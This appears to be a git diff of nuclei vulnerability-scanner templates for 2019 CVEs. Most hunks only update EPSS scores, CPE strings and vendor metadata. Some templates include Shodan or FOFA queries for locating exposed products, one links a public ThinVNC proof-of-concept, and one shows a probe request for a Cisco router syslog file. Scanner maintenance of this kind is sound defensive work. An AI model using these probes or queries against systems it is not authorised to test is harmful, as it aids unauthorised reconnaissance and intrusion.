metadata:
max-request: 1
vendor: linuxfoundation
diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml
index 5bf5681821..03f426669a 100644
--- a/http/cves/2019/CVE-2019-16123.yaml
+++ b/http/cves/2019/CVE-2019-16123.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.72953
cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97666
metadata:
max-request: 1
vendor: kartatopia
diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml
index 9c5219eaa8..db3200eb5d 100644
--- a/http/cves/2019/CVE-2019-16278.yaml
+++ b/http/cves/2019/CVE-2019-16278.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16278
cwe-id: CWE-22
- epss-score: 0.97376
+ epss-score: 0.97349
cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99835
metadata:
max-request: 1
vendor: nazgul
diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml
index b749d5a6e5..07a4dc519f 100644
--- a/http/cves/2019/CVE-2019-16313.yaml
+++ b/http/cves/2019/CVE-2019-16313.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-16313
cwe-id: CWE-798
- epss-score: 0.02088
+ epss-score: 0.02626
cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:*
+ epss-percentile: 0.88983
metadata:
max-request: 1
vendor: ifw8
diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml
index 4d1f93f688..f23c1f73d7 100644
--- a/http/cves/2019/CVE-2019-16332.yaml
+++ b/http/cves/2019/CVE-2019-16332.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00303
cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.65787
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml
index f2ed79fc67..f775af5a28 100644
--- a/http/cves/2019/CVE-2019-16525.yaml
+++ b/http/cves/2019/CVE-2019-16525.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00323
cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.66929
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml
index e07d6e2a4e..033cfb87dd 100644
--- a/http/cves/2019/CVE-2019-1653.yaml
+++ b/http/cves/2019/CVE-2019-1653.yaml
@@ -21,6 +21,7 @@ info:
cwe-id: CWE-200,CWE-284
epss-score: 0.97578
cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:*
+ epss-percentile: 1
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml
index 7b2b981f1b..14e844f025 100644
--- a/http/cves/2019/CVE-2019-16662.yaml
+++ b/http/cves/2019/CVE-2019-16662.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97573
cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:*
+ epss-percentile: 0.99999
metadata:
max-request: 1
vendor: rconfig
diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml
index 6359e923b0..f04ae0d7e4 100644
--- a/http/cves/2019/CVE-2019-16759.yaml
+++ b/http/cves/2019/CVE-2019-16759.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-94
epss-score: 0.97535
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99987
metadata:
max-request: 1
shodan-query: http.component:"vBulletin"
diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml
index e048cf18e2..3d09e06043 100644
--- a/http/cves/2019/CVE-2019-16920.yaml
+++ b/http/cves/2019/CVE-2019-16920.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16920
cwe-id: CWE-78
- epss-score: 0.96236
+ epss-score: 0.96275
cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99325
metadata:
max-request: 3
vendor: dlink
diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml
index f03534446c..6feffb993f 100644
--- a/http/cves/2019/CVE-2019-16931.yaml
+++ b/http/cves/2019/CVE-2019-16931.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00244
cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.61655
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml
index 503ca729ea..8469e34c22 100644
--- a/http/cves/2019/CVE-2019-16932.yaml
+++ b/http/cves/2019/CVE-2019-16932.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-918
epss-score: 0.53434
cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97161
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml
index 4f67d94790..cbc2a831a2 100644
--- a/http/cves/2019/CVE-2019-16996.yaml
+++ b/http/cves/2019/CVE-2019-16996.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-89
epss-score: 0.30632
cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*
+ epss-percentile: 0.96378
metadata:
max-request: 1
vendor: metinfo
diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml
index 94c5cf4036..433c153d3b 100644
--- a/http/cves/2019/CVE-2019-16997.yaml
+++ b/http/cves/2019/CVE-2019-16997.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-89
epss-score: 0.30632
cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*
+ epss-percentile: 0.96378
metadata:
max-request: 1
vendor: metinfo
diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml
index 56a98483d6..0c7190dadc 100644
--- a/http/cves/2019/CVE-2019-17270.yaml
+++ b/http/cves/2019/CVE-2019-17270.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-17270
cwe-id: CWE-78
- epss-score: 0.94991
+ epss-score: 0.94092
cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98826
metadata:
max-request: 1
vendor: yachtcontrol
diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml
index 5e91afd3e5..a14fed3bd1 100644
--- a/http/cves/2019/CVE-2019-17382.yaml
+++ b/http/cves/2019/CVE-2019-17382.yaml
@@ -8,13 +8,15 @@ info:
reference:
- https://www.exploit-db.com/exploits/47467
- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
+ - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2019-17382
cwe-id: CWE-639
- epss-score: 0.16332
+ epss-score: 0.25064
cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9605
metadata:
max-request: 100
vendor: zabbix
diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml
index f7ee14842b..e205ffca3f 100644
--- a/http/cves/2019/CVE-2019-17418.yaml
+++ b/http/cves/2019/CVE-2019-17418.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-89
epss-score: 0.43984
cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*
+ epss-percentile: 0.96882
metadata:
max-request: 1
vendor: metinfo
diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml
index 069dcd0c9a..0f21492478 100644
--- a/http/cves/2019/CVE-2019-17444.yaml
+++ b/http/cves/2019/CVE-2019-17444.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-17444
cwe-id: CWE-521
- epss-score: 0.06223
+ epss-score: 0.07015
cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:*
+ epss-percentile: 0.9309
metadata:
max-request: 1
framework: "-"
diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml
index 85729c29ef..9b406d4397 100644
--- a/http/cves/2019/CVE-2019-17503.yaml
+++ b/http/cves/2019/CVE-2019-17503.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2019-17503
cwe-id: CWE-425
- epss-score: 0.00339
+ epss-score: 0.00433
cpe: cpe:2.3:a:kirona:dynamic_resource_scheduling:5.5.3.5:*:*:*:*:*:*:*
+ epss-percentile: 0.71395
metadata:
max-request: 2
vendor: kirona
diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml
index 1f91961bac..f151a8daf0 100644
--- a/http/cves/2019/CVE-2019-17506.yaml
+++ b/http/cves/2019/CVE-2019-17506.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-306
epss-score: 0.90125
cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:*
+ epss-percentile: 0.98375
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml
index 0d09d40625..26b8cd34e6 100644
--- a/http/cves/2019/CVE-2019-17538.yaml
+++ b/http/cves/2019/CVE-2019-17538.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00838
cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79928
metadata:
max-request: 1
vendor: jnoj
diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml
index 7201400b6b..90017eb190 100644
--- a/http/cves/2019/CVE-2019-17558.yaml
+++ b/http/cves/2019/CVE-2019-17558.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-74
epss-score: 0.97543
cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99991
metadata:
max-request: 3
vendor: apache
diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml
index 9c0e434b36..aa36e4b524 100644
--- a/http/cves/2019/CVE-2019-17574.yaml
+++ b/http/cves/2019/CVE-2019-17574.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.1
cve-id: 'CVE-2019-17574'
cwe-id: CWE-639
- epss-score: 0.15779
+ epss-score: 0.14192
cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94987
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml
index 7bc0b472df..f4ef2abd0a 100644
--- a/http/cves/2019/CVE-2019-17662.yaml
+++ b/http/cves/2019/CVE-2019-17662.yaml
@@ -10,15 +10,22 @@ info:
- http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
- https://github.com/bewest/thinvnc/issues/5
- https://redteamzone.com/ThinVNC/
+ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
- cwe-id: CWE-522,CWE-22
+ cve-id: CVE-2019-17662
+ cwe-id: CWE-22
+ epss-score: 0.50347
+ cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
+ epss-percentile: 0.9709
metadata:
max-request: 1
shodan-query: http.favicon.hash:-1414548363
verified: true
- tags: cve,cve2019,auth-bypass,thinvnc
+ vendor: cybelsoft
+ product: thinvnc
+ tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml
index 9a9f536010..972dc249ef 100644
--- a/http/cves/2019/CVE-2019-1821.yaml
+++ b/http/cves/2019/CVE-2019-1821.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-20
epss-score: 0.96882
cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99577
metadata:
max-request: 2
shodan-query: http.title:"prime infrastructure"
diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml
index 80178d5a07..dc15d6313b 100644
--- a/http/cves/2019/CVE-2019-18371.yaml
+++ b/http/cves/2019/CVE-2019-18371.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-18371
cwe-id: CWE-22
- epss-score: 0.01614
+ epss-score: 0.02272
cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88207
metadata:
max-request: 1
vendor: mi
diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml
index ee726c7858..f703ea0056 100644
--- a/http/cves/2019/CVE-2019-18393.yaml
+++ b/http/cves/2019/CVE-2019-18393.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00161
cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
+ epss-percentile: 0.52069
metadata:
max-request: 1
vendor: igniterealtime
diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml
index c8fd2ed149..67048a5f59 100644
--- a/http/cves/2019/CVE-2019-18394.yaml
+++ b/http/cves/2019/CVE-2019-18394.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-18394
cwe-id: CWE-918
- epss-score: 0.62562
+ epss-score: 0.5914
cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97299
metadata:
max-request: 1
vendor: igniterealtime
diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml
index eb08192ae9..47aa383dcc 100644
--- a/http/cves/2019/CVE-2019-18665.yaml
+++ b/http/cves/2019/CVE-2019-18665.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-18665
cwe-id: CWE-22
- epss-score: 0.10136
+ epss-score: 0.0855
cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93623
metadata:
max-request: 1
vendor: secudos
diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml
index eab1daa153..3f9a2656b5 100644
--- a/http/cves/2019/CVE-2019-18818.yaml
+++ b/http/cves/2019/CVE-2019-18818.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-18818
cwe-id: CWE-640
- epss-score: 0.82132
+ epss-score: 0.88411
cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98263
metadata:
max-request: 1
vendor: strapi
diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml
index 96f786b121..d4189c57da 100644
--- a/http/cves/2019/CVE-2019-18922.yaml
+++ b/http/cves/2019/CVE-2019-18922.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-18922
cwe-id: CWE-22
- epss-score: 0.06307
+ epss-score: 0.16768
cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95348
metadata:
max-request: 1
vendor: alliedtelesis
diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml
index 22a0f7bc8c..6a66a42b94 100644
--- a/http/cves/2019/CVE-2019-18957.yaml
+++ b/http/cves/2019/CVE-2019-18957.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00247
cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:*
+ epss-percentile: 0.61933
metadata:
max-request: 1
vendor: microstrategy
diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml
index 7dfcc16ae3..1b6944941c 100644
--- a/http/cves/2019/CVE-2019-1898.yaml
+++ b/http/cves/2019/CVE-2019-1898.yaml
@@ -13,20 +13,26 @@ info:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
+ cve-id: CVE-2019-1898
cwe-id: CWE-425,CWE-285
+ epss-score: 0.06482
+ cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.928
metadata:
fofa-query: icon_hash="-646322113"
verified: true
max-request: 1
+ vendor: cisco
+ product: rv110w_firmware
tags: cve,cve2019,cisco,router,iot
http:
- method: POST
path:
- '{{BaseURL}}/_syslog.txt'
+
headers:
Content-Type: application/x-www-form-urlencoded
-
matchers:
- type: dsl
dsl:
diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml
index 10664f4e50..99ea844c17 100644
--- a/http/cves/2019/CVE-2019-19134.yaml
+++ b/http/cves/2019/CVE-2019-19134.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00203
cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.57549
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml
index b9337c98c8..db0f39cfa3 100644
--- a/http/cves/2019/CVE-2019-19368.yaml
+++ b/http/cves/2019/CVE-2019-19368.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-19368
cwe-id: CWE-79
- epss-score: 0.00596
+ epss-score: 0.00625
cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:*
+ epss-percentile: 0.76278
metadata:
max-request: 1
vendor: maxum
diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml
index 6f6b305cf8..9bcec51f8a 100644
--- a/http/cves/2019/CVE-2019-1943.yaml
+++ b/http/cves/2019/CVE-2019-1943.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.03526
cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.90351
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml
index 67af451b7e..76506e3561 100644
--- a/http/cves/2019/CVE-2019-19781.yaml
+++ b/http/cves/2019/CVE-2019-19781.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-19781
cwe-id: CWE-22
- epss-score: 0.9748
+ epss-score: 0.97541
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:*
+ epss-percentile: 0.9999
metadata:
max-request: 1
vendor: citrix
diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml
index 5f7ae70a16..972949af09 100644
--- a/http/cves/2019/CVE-2019-19824.yaml
+++ b/http/cves/2019/CVE-2019-19824.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2019-19824
cwe-id: CWE-78
- epss-score: 0.97234
+ epss-score: 0.96631
cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99466
metadata:
max-request: 1
vendor: totolink
diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml
index 46acb2ea46..382590b1bc 100644
--- a/http/cves/2019/CVE-2019-19908.yaml
+++ b/http/cves/2019/CVE-2019-19908.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00622
cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:*
+ epss-percentile: 0.76214
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml
index a1e1c096e0..ac0a24c888 100644
--- a/http/cves/2019/CVE-2019-19985.yaml
+++ b/http/cves/2019/CVE-2019-19985.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2019-19985
cwe-id: CWE-862
- epss-score: 0.05682
+ epss-score: 0.08255
cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93525
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml
index a95fb2b904..a1f5bdc87b 100644
--- a/http/cves/2019/CVE-2019-20085.yaml
+++ b/http/cves/2019/CVE-2019-20085.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-20085
cwe-id: CWE-22
- epss-score: 0.43503
+ epss-score: 0.58096
cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.97276
metadata:
max-request: 1
vendor: tvt
diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml
index 9c3d70ca9b..e89a0a157f 100644
--- a/http/cves/2019/CVE-2019-20141.yaml
+++ b/http/cves/2019/CVE-2019-20141.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00125
cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.46269
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml
index b2ed58fd38..41abdf4d20 100644
--- a/http/cves/2019/CVE-2019-20183.yaml
+++ b/http/cves/2019/CVE-2019-20183.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-434
epss-score: 0.0192
cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.87111
metadata:
max-request: 2
vendor: employee_records_system_project
diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml
index 6d11af6009..415507c748 100644
--- a/http/cves/2019/CVE-2019-20210.yaml
+++ b/http/cves/2019/CVE-2019-20210.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00249
cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.62023
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml
index dce04f1594..bf7aa62649 100644
--- a/http/cves/2019/CVE-2019-20224.yaml
+++ b/http/cves/2019/CVE-2019-20224.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2019-20224
cwe-id: CWE-78
- epss-score: 0.18509
+ epss-score: 0.15573
cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:*
+ epss-percentile: 0.95195
metadata:
max-request: 2
vendor: artica
diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml
index cb7d0bafb4..8d52a31491 100644
--- a/http/cves/2019/CVE-2019-20933.yaml
+++ b/http/cves/2019/CVE-2019-20933.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-20933
cwe-id: CWE-287
- epss-score: 0.04077
+ epss-score: 0.03713
cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90575
metadata:
max-request: 1
shodan-query: InfluxDB
diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml
index 78a2e96658..ee7c58b8fd 100644
--- a/http/cves/2019/CVE-2019-2578.yaml
+++ b/http/cves/2019/CVE-2019-2578.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2019-2578
- epss-score: 0.00659
+ epss-score: 0.00815
cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79635
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml
index c29b9fa08e..602db3bc98 100644
--- a/http/cves/2019/CVE-2019-2579.yaml
+++ b/http/cves/2019/CVE-2019-2579.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2019-2579
epss-score: 0.00493
cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.73168
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml
index fa1e185353..fd0ab45e66 100644
--- a/http/cves/2019/CVE-2019-2588.yaml
+++ b/http/cves/2019/CVE-2019-2588.yaml
@@ -13,8 +13,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2019-2588
- epss-score: 0.08268
+ epss-score: 0.10482
cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94259
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml
index aa68a18ec5..5f2b354490 100644
--- a/http/cves/2019/CVE-2019-2616.yaml
+++ b/http/cves/2019/CVE-2019-2616.yaml
@@ -13,8 +13,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2019-2616
- epss-score: 0.93436
+ epss-score: 0.94746
cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:*
+ epss-percentile: 0.98945
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml
index dbb90c225c..b29054a931 100644
--- a/http/cves/2019/CVE-2019-2725.yaml
+++ b/http/cves/2019/CVE-2019-2725.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-2725
cwe-id: CWE-74
- epss-score: 0.97568
+ epss-score: 0.97571
cpe: cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*
+ epss-percentile: 0.99998
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml
index a97b411b90..099f2c7c7d 100644
--- a/http/cves/2019/CVE-2019-2729.yaml
+++ b/http/cves/2019/CVE-2019-2729.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-2729
cwe-id: CWE-284
- epss-score: 0.97192
+ epss-score: 0.97178
cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99717
metadata:
max-request: 3
vendor: oracle
diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml
index 791d7dfe40..94f3aee397 100644
--- a/http/cves/2019/CVE-2019-2767.yaml
+++ b/http/cves/2019/CVE-2019-2767.yaml
@@ -15,6 +15,7 @@ info:
cve-id: CVE-2019-2767
epss-score: 0.14972
cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*
+ epss-percentile: 0.95103
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml
index 302b2b56c3..bcedb819b6 100644
--- a/http/cves/2019/CVE-2019-3396.yaml
+++ b/http/cves/2019/CVE-2019-3396.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-3396
cwe-id: CWE-22
- epss-score: 0.975
+ epss-score: 0.97498
cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
